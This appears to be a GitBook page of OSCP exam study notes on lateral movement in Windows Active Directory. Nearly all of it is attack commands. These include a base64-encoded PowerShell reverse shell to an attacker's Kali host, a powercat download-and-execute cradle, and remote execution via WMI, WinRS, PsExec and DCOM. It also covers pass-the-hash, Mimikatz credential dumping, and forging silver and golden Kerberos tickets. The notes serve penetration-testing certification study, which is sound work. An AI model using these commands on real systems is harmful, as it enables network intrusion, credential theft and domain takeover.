📘
OSCP Exam Prep
OSCP Exam Prep
OSCP Exam Prep
  • Reference List
  • Guideline
  • Commons
    • Basic Scans
    • Service Enumeration
      • HTTP(S) (80 / 443)
      • SMB (139 / 445)
      • FTP (21)
      • DNS (53)
      • SSH (22)
      • LDAP (389/636/3268)
      • Kerberos (88)
      • SNMP (161)
      • SMTP (25)
      • RDP (3389)
      • Evil-WinRM (5985/5986)
      • MYSQL (3306)
      • MSSQL (1433)
    • Default/Common Credentials
    • Shells
      • TTY Shell
    • File Transfer
    • KeePass Database
    • Port Forwarding
    • File Metadata
  • Attacks
    • Run a command x times
    • Public Exploits
    • User Creation
    • Password Cracking
      • Using custom wordlists
    • LFI/RFI
    • SQLi
    • PwnKit
    • SAM and SYSTEM files
    • Phishing for Access (Requires MailSVR)
    • GitDumper
  • Enumeration
    • Linux
    • Windows
  • Privilege Escalation
    • Linux
    • Windows
  • Port Forwarding Extras
    • Linux
    • Windows
  • Active Directory
    • Enumeration
    • Lateral Movement
    • Privilege Escalation
Powered by GitBook
On this page
  • Via Reverse Shells
  • WMI
  • Powershell
  • WINRS
  • PsExec
  • Passing the Hash
  • DCOM
  • SSH private keys
  • Mimikatz
  • Creating Users
  1. Active Directory

Lateral Movement

Via Reverse Shells

Oneliner reverse shell:

    $payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP>",<Listening Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
Powercat reverse shell:

    $payload = "IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP>/powercat.ps1');powercat -c <Kali IP> -p <Listening Port> -e powershell"
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

WMI

On the Victime Machine:
    wmic /node:<target IP> /user:<username> /password:<password> process call create "<payload>"

Execute payload
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "cmd"
    
    Example - $full_payload = "powershell -nop -w hidden -e $encodedPayload"
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "$full_payload"

Powershell

$username = "<username>";
$password = "<password>";
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$sessionOption = New-CimSessionOption -Protocol Dcom
$session = New-CimSession -ComputerName <IP> -Credential $credential -SessionOption $sessionOption

$full_payload = "powershell -nop -w hidden -e $encodedPayload"

Execute payload
    Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $payload}
    
    OR
    
    New-PSSession -ComputerName <IP> -Credential $credential

WINRS

$full_payload = "powershell -nop -w hidden -e $encodedPayload"
winrs -r:<target IP/hostname> -u:<username> -p:<password> "$payload"

PsExec

On Kali machine:
    git clone https://github.com/davehardy20/sysinternals.git
        > Located in sysinterals/psexec64.exe
        > Transfer executable to the compromized machine

On Victim machine:
    psexec64.exe -i \\<target IP/hostname> -u <domain name>\<username> -p "<password>" "<payload>"

Passing the Hash

On Kali machine:
	impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>
	proxychains impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>

DCOM

1. Instantiate a remote MMC 2.0 application
	$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))

2. Start up a listener to catch reverse shells on our kali
	nc -nlvp 4444

3. Generate the payload, and 
	$full_payload = "powershell -nop -w hidden -e $encodedPayload"
	$dcom.Document.ActiveView.ExecuteShellCommand("<cmd | powershell>",$null,"$full_payload","7")

4. Return to the listener on our kali, we should receive a reverse shell coming from the target machine.

SSH private keys

ssh-keygen -t rsa
	# Used to generate a ssh keypair

ssh -i <private key> <username>@<IP>
ssh -i <private key> <username>@<IP> -o IdentitiesOnly=yes
	# Use when there are multiple private keys in the .ssh directory

Mimikatz

./mimikatz.exe
privilege::debug
	Identify target service user NTLM hash: sekurlsa::logonpasswords
	Identify krbtgt NTLM hash: lsadump::lsa /patch
	Get Domain SID: whoami /user

Overpass the Hash
	sekurlsa::pth /user:<username> /ntlm:<NTLM hash> /domain:<domain name> /run:<cmd | powershell>
	net use \\<target IP/hostname>
	./PsExec64.exe \\<target IP/hostname> <cmd | powershell>

Pass the Ticket
	sekurlsa::tickets /export
		# dir *.kirbi | findstr <username>
	kerberos::ptt <cifs.kirbi file name>
		# Attempt to access the resource as the current user, the authentication process will now make use of the newly injected TGT
	Example: ls \\<target IP/hostname>\<share name>
		iwr -UseDefaultCredentials http://<target IP/hostname>

Silver Ticket for specific service:
	kerberos::golden /rc4:<Target SPN NTLM Hash>  /sid:<Domain SID>  /domain:<domain name> /ptt /target:<Target SPN>  /service:<service protocol> /user:<authorized username>


Golden Ticket for all services:
	kerberos::golden /user:<username> /domain:<domain name> /sid:<domain SID> /krbtgt:<krbtgt NTLM hash> /ptt>

	Verify tickets with: klist

Creating Users

PreviousEnumerationNextPrivilege Escalation

Last updated 25 days ago